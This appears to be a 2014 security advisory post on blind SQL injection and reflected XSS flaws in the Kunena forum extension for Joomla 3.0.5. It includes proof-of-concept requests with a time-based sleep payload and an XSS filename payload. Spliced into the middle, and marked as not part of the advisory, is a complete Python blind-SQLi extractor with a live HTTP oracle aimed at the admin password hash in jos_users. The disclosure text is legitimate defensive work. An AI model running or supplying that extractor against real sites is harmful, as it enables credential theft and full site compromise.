
Kunena Forum for Joomla Multiple Vulnerabilities

28 Jul

The Kunena forum extension for Joomla suffers from multiple SQL injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. The vulnerabilities affect Kunena v3.0.5 and earlier.

The blind SQL injection vulnerability affects all pages/tasks that accept parameters in the array form “parameter[]”, because the array key (index) is not validated before it reaches the database query. Attackers can use the vulnerability to read sensitive data stored in the Joomla database, including the credentials of the website’s admin users, which can then be used to compromise the entire website.

Blind SQL injection relies on the ability to determine whether a condition is true or false by observing a change in the application’s behaviour. In the time-based variant used here, a true condition makes the database pause before responding, so the answer is read from the response time, as the following examples show.

A true condition will cause a 10 second delay in the server’s response:

POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d1,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go

Response time: ~11.5 seconds

A false condition will cause the server to respond without delay:

POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d2,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go

Response time: ~1.5 seconds
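As an added example (not code from the advisory, Dionach or Kunena), the following Python script turns the true/false timing oracle shown above into a character-by-character extractor, and pairs it with an offline SQLite stand-in for the oracle and a hardened IN-clause builder. The query shape `WHERE id IN (<array keys>)`, the table and column names (`jos_users`, `password`), and the URL, session token and cookie values passed to the HTTP oracle are assumptions made for illustration, not facts taken from the advisory.

```python
"""Time-based blind SQL injection extractor for the oracle described in the
advisory (added example; not Dionach's or Kunena's code). Assumed, not from the
advisory: the target query shape, the jos_users/password names, and the
URL/token/cookie values handed to make_http_oracle()."""
import sqlite3
import time
import urllib.error
import urllib.parse
import urllib.request


def build_payload(condition: str, delay: int = 10) -> str:
    """The array key used in the advisory's requests: close the assumed
    IN (...) list, add a MySQL conditional sleep, comment out the rest."""
    return f"2) and (if({condition},sleep({delay}),1))=1#"


def make_http_oracle(url: str, fields: dict, cookie: str, delay: int = 10):
    """Return condition -> bool for a live target (assumed URL, form fields
    such as the session token, and cookie). A true condition makes MySQL
    sleep `delay` seconds; anything over half of that counts as true so the
    ~1.5 s baseline seen in the advisory is not misread as a delay."""

    def oracle(condition: str) -> bool:
        data = dict(fields)
        data[f"topics[{build_payload(condition, delay)}]"] = "1"
        body = urllib.parse.urlencode(data).encode()
        req = urllib.request.Request(url, data=body, method="POST",
                                     headers={"Cookie": cookie})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=delay * 3) as resp:
                resp.read()
        except urllib.error.HTTPError as err:  # error page still carries timing
            err.read()
        return time.monotonic() - start >= delay / 2

    return oracle


def extract_string(oracle, expr: str, max_len: int = 255) -> str:
    """Recover the value of a SQL expression using only true/false answers:
    binary search on length(), then on ascii(substring()) per character
    (printable ASCII only; about 7 queries per character)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({expr}))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"ascii(substring(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def make_simulated_oracle(seed_password: str):
    """Offline stand-in for the live oracle: evaluates the injected condition
    in SQLite, with MySQL-style ascii()/substring() shims, over a constructed
    jos_users table (table/column names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    db.create_function("substring", 3, lambda s, p, n: s[p - 1:p - 1 + n])
    db.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO jos_users VALUES (42, 'admin', ?)", (seed_password,))

    def oracle(condition: str) -> bool:
        return bool(db.execute(f"SELECT ({condition})").fetchone()[0])

    return oracle


def safe_in_clause(keys):
    """One way to close the hole (an assumption about the fix, not Kunena's
    code): accept only integer array keys and bind them as placeholders, so a
    key like build_payload() produces is rejected before any SQL is built."""
    ids = []
    for key in keys:
        key = str(key)
        if not key.isdigit():
            raise ValueError(f"rejected non-numeric array key: {key!r}")
        ids.append(int(key))
    if not ids:
        raise ValueError("no ids supplied")
    return "WHERE id IN (" + ",".join("?" * len(ids)) + ")", ids


if __name__ == "__main__":
    # Constructed secret; a real run would swap in make_http_oracle(...).
    oracle = make_simulated_oracle("constructed-hash:salt")
    print(extract_string(oracle, "select password from jos_users limit 1"))
```

Against a live target the same `extract_string()` call works unchanged with an oracle from `make_http_oracle()`; each true answer costs the full sleep, so a 65-character Joomla password hash takes several hundred requests and a few tens of minutes, which is why the delay-based check is worth keeping conservative.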

The file upload and profile image upload functions of the forum extension are vulnerable to reflected cross-site scripting. Moreover, every page that is vulnerable to the blind SQL injection is also vulnerable to reflected cross-site scripting, because the detailed error message returned by the server reflects the injected input. An attacker may leverage this to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials and to launch other attacks such as drive-by downloads.

The following proof of concept shows how an attacker can exploit the vulnerability in the profile image upload functionality in order to display an alert box:

POST http://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&I...

-----------------------------34391417828549
Content-Disposition: form-data; name="view"

user
-----------------------------34391417828549
Content-Disposition: form-data; name="task"

Save
[…]
Content-Disposition: form-data; name="avatarfile"; filename="<iframe src=javascript:alert('XSS')>"
[…]

Solution

The vendor has released a new version (3.0.6) to address the security vulnerabilities discovered by Dionach. The new version was released on the 28th of July 2014. Users are advised to update the Kunena forum extension for Joomla to the latest secure and stable version.

References

http://www.kunena.org/docs/Kunena_3.0.6_Read_Me

http://www.securityfocus.com/bid/68956/


Posted by Ray
